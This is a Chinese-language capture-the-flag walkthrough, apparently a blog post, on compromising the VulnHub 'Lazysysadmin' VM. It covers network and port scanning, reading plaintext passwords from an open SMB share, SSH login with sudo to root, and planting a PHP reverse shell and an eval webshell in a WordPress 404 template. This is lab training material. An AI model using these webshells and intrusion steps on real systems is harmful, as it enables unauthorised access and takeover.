VM - Lazysysadmin 的破解

本文主要記錄對 Lazysysadmin 的滲透學習過程，測試的 VM 主機主要來源 www.vulnhub.com
部落格集：面向 CTF 的 VM 破解系列
下載連結： Lazysysadmin

1. ip 探測

1. ip 探測

   使用 netdiscover，由於在內網，可以直接掃網網段

    root@kali:~# netdiscover -r 10.10.10.0/24
     Currently scanning: Finished!   |   Screen View: Unique Hosts                            
    																						  
     5 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 300                          
     _____________________________________________________________________________
       IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
     -----------------------------------------------------------------------------
     10.10.10.1      00:50:56:c0:00:08      2     120  VMware, Inc.                           
     10.10.10.2      00:50:56:e5:a6:4e      1      60  VMware, Inc.                           
     10.10.10.133    00:0c:29:9e:53:39      1      60  VMware, Inc.                           
     10.10.10.254    00:50:56:ea:fa:42      1      60  VMware, Inc.  
   

   發現 ip 地址為 10.10.10.133

2. 埠掃描

   使用 masscan ,可以進行限速

    root@kali:~# masscan 10.10.10.133 -p1-1000 --rate=10000
    
    Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2018-08-16 13:16:13 GMT
     -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
    Initiating SYN Stealth Scan
    Scanning 1 hosts [1000 ports/host]
    Discovered open port 22/tcp on 10.10.10.133                                    
    Discovered open port 80/tcp on 10.10.10.133                                    
    Discovered open port 139/tcp on 10.10.10.133                                   
    Discovered open port 445/tcp on 10.10.10.133  
   

3. 掃描埠和服務

   使用 nmap 掃描

    root@kali:~# nmap -T4 -A -v 10.10.10.133 -p0-10000
    Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-16 09:18 EDT
    NSE: Loaded 148 scripts for scanning.
    NSE: Script Pre-scanning.
    Initiating NSE at 09:18
    Completed NSE at 09:18, 0.00s elapsed
    Initiating NSE at 09:18
    Completed NSE at 09:18, 0.00s elapsed
    Initiating ARP Ping Scan at 09:18
    Scanning 10.10.10.133 [1 port]
    Completed ARP Ping Scan at 09:18, 0.04s elapsed (1 total hosts)
    Initiating Parallel DNS resolution of 1 host. at 09:18
    Completed Parallel DNS resolution of 1 host. at 09:18, 0.02s elapsed
    Initiating SYN Stealth Scan at 09:18
    Scanning 10.10.10.133 (10.10.10.133) [10001 ports]
    Discovered open port 3306/tcp on 10.10.10.133
    Discovered open port 22/tcp on 10.10.10.133
    Discovered open port 139/tcp on 10.10.10.133
    Discovered open port 445/tcp on 10.10.10.133
    Discovered open port 80/tcp on 10.10.10.133
    Discovered open port 6667/tcp on 10.10.10.133
    Completed SYN Stealth Scan at 09:18, 1.41s elapsed (10001 total ports)
    Initiating Service scan at 09:18
    Scanning 6 services on 10.10.10.133 (10.10.10.133)
    Completed Service scan at 09:19, 11.03s elapsed (6 services on 1 host)
    Initiating OS detection (try #1) against 10.10.10.133 (10.10.10.133)
    NSE: Script scanning 10.10.10.133.
    Initiating NSE at 09:19
    Completed NSE at 09:19, 10.27s elapsed
    Initiating NSE at 09:19
    Completed NSE at 09:19, 0.01s elapsed
    Nmap scan report for 10.10.10.133 (10.10.10.133)
    Host is up (0.00088s latency).
    Not shown: 9995 closed ports
    PORT     STATE SERVICE     VERSION
    22/tcp   open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   1024 b5:38:66:0f:a1:ee:cd:41:69:3b:82:cf:ad:a1:f7:13 (DSA)
    |   2048 58:5a:63:69:d0:da:dd:51:cc:c1:6e:00:fd:7e:61:d0 (RSA)
    |   256 61:30:f3:55:1a:0d:de:c8:6a:59:5b:c9:9c:b4:92:04 (ECDSA)
    |_  256 1f:65:c0:dd:15:e6:e4:21:f2:c1:9b:a3:b6:55:a0:45 (ED25519)
    80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
    |_http-generator: Silex v2.2.7
    | http-methods: 
    |_  Supported Methods: OPTIONS GET HEAD POST
    | http-robots.txt: 4 disallowed entries 
    |_/old/ /test/ /TR2/ /Backnode_files/
    |_http-server-header: Apache/2.4.7 (Ubuntu)
    |_http-title: Backnode
    139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
    445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
    3306/tcp open  mysql       MySQL (unauthorized)
    6667/tcp open  irc         InspIRCd
    | irc-info: 
    |   server: Admin.local
    |   users: 1
    |   servers: 1
    |   chans: 0
    |   lusers: 1
    |   lservers: 0
    |   source ident: nmap
    |   source host: 10.10.10.128
    |_  error: Closing link: (nmap@10.10.10.128) [Client exited]
    MAC Address: 00:0C:29:9E:53:39 (VMware)
    Device type: general purpose
    Running: Linux 3.X|4.X
    OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
    OS details: Linux 3.2 - 4.9
    Uptime guess: 0.008 days (since Thu Aug 16 09:07:34 2018)
    Network Distance: 1 hop
    TCP Sequence Prediction: Difficulty=259 (Good luck!)
    IP ID Sequence Generation: All zeros
    Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel
   
    Host script results:
    |_clock-skew: mean: -3h20m00s, deviation: 5h46m24s, median: 0s
    | nbstat: NetBIOS name: LAZYSYSADMIN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
    | Names:
    |   LAZYSYSADMIN<00>     Flags: <unique><active>
    |   LAZYSYSADMIN<03>     Flags: <unique><active>
    |   LAZYSYSADMIN<20>     Flags: <unique><active>
    |   WORKGROUP<00>        Flags: <group><active>
    |_  WORKGROUP<1e>        Flags: <group><active>
    | smb-os-discovery: 
    |   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
    |   Computer name: lazysysadmin
    |   NetBIOS computer name: LAZYSYSADMIN\x00
    |   Domain name: \x00
    |   FQDN: lazysysadmin
    |_  System time: 2018-08-16T23:19:03+10:00
    | smb-security-mode: 
    |   account_used: guest
    |   authentication_level: user
    |   challenge_response: supported
    |_  message_signing: disabled (dangerous, but default)
    | smb2-security-mode: 
    |   2.02: 
    |_    Message signing enabled but not required
    | smb2-time: 
    |   date: 2018-08-16 09:19:03
    |_  start_date: N/A
   
    TRACEROUTE
    HOP RTT     ADDRESS
    1   0.88 ms 10.10.10.133 (10.10.10.133)
   
    NSE: Script Post-scanning.
    Initiating NSE at 09:19
    Completed NSE at 09:19, 0.00s elapsed
    Initiating NSE at 09:19
    Completed NSE at 09:19, 0.00s elapsed
    Read data files from: /usr/bin/../share/nmap
    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 28.49 seconds
    		   Raw packets sent: 10024 (441.850KB) | Rcvd: 10017 (401.394KB)
   

4. 爆破目錄

   使用 dirb 爆破目錄

    root@kali:~# dirb http://10.10.10.133 /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o Desktop/result.txt
   

5. 獲取伺服器的 banner 資訊

    root@kali:~# curl -I 10.10.10.133
    HTTP/1.1 200 OK
    Date: Thu, 16 Aug 2018 13:29:36 GMT
    Server: Apache/2.4.7 (Ubuntu)
    Last-Modified: Sun, 06 Aug 2017 05:02:15 GMT
    ETag: "8ce8-5560ea23d23c0"
    Accept-Ranges: bytes
    Content-Length: 36072
    Vary: Accept-Encoding
    Content-Type: text/html
   

6. 使用 wpscan 掃描

    root@kali:~# wpscan -u http://10.10.10.133/wordpress --force
   

7. 使用 enum4linux 掃描

    root@kali:~# enum4linux 10.10.10.133
   

8. 獲取共享資源

   win 下

    net user k" \\10.10.10.133\share
   

   linux 下

    root@kali:~# mount -t cifs -o username='',password='' //10.10.10.133/share$ /mnt
    root@kali:~# cd /mnt/
   

   發現了兩個重要檔案 deets.txt 和 wp-config.php

    root@kali:/mnt# cat deets.txt 
    	CBF Remembering all these passwords.
    	Remember to remove this file and update your password after we push out the server.
    	Password 12345
    root@kali:/mnt/wordpress# cat wp-config.php 
    	// ** MySQL settings - You can get this info from your web host ** //
    	/** The name of the database for WordPress */
    	define('DB_NAME', 'wordpress');
   
    	/** MySQL database username */
    	define('DB_USER', 'Admin');
   
    	/** MySQL database password */
    	define('DB_PASSWORD', 'TogieMYSQL12345^^');
   
    	/** MySQL hostname */
    	define('DB_HOST', 'localhost');
   
    	/** Database Charset to use in creating database tables. */
    	define('DB_CHARSET', 'utf8');
   
    	/** The Database Collate type. Don't change this if in doubt. */
    	define('DB_COLLATE', '');
   

   上述發現敏感檔案，密碼為 12345，mysql 使用者名稱和密碼為 Admin：TogieMYSQL12345^^

9. 登入 ssh

   登入 phpmyadmin
   訪問 wordpress 頁面發現提示使用者名稱為 togie，使用 ssh 登入

    ssh togie@10.10.10.133
   

   登入成功

    togie@LazySysAdmin:~$ whoami
    togie
    togie@LazySysAdmin:~$ id
    uid=1000(togie) gid=1000(togie) groups=1000(togie),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare)
    togie@LazySysAdmin:~$ sudo su
    [sudo] password for togie: 
    root@LazySysAdmin:/home/togie# 
   

   檢視 flag

    root@LazySysAdmin:~# cat proof.txt 
   

10. 登入 wordpress

    在管理頁面的 Apperance -> Editor ，修改 404 頁面的模板

    新增內容：

    set_time_limit (0);
    $VERSION = "1.0";
    $ip = '10.10.10.128';
    $port = '4444';
    $CHUNK_size = 1400;
    $write_a = null;
    $error_a = null;
    $shell = 'uname -a;w;id;/bin/sh -i';
    $darmon = 0;
    $debug = 0;
    

    kali 設定反彈，獲取到初始的 shell 環境

    或者修改為一句話木馬，使用菜刀連線

    <?php eval($_POST[pass]);?>

    http://10.10.10.133/wordpress/wp-content/themes/twentyfifteen/404.php
    提示 no tty present and no asdpass program spacified

    可以使用 python -c ‘import pty; pty.spawn("/bin/sh")’，將初始的 shell 切換為 bash shell 環境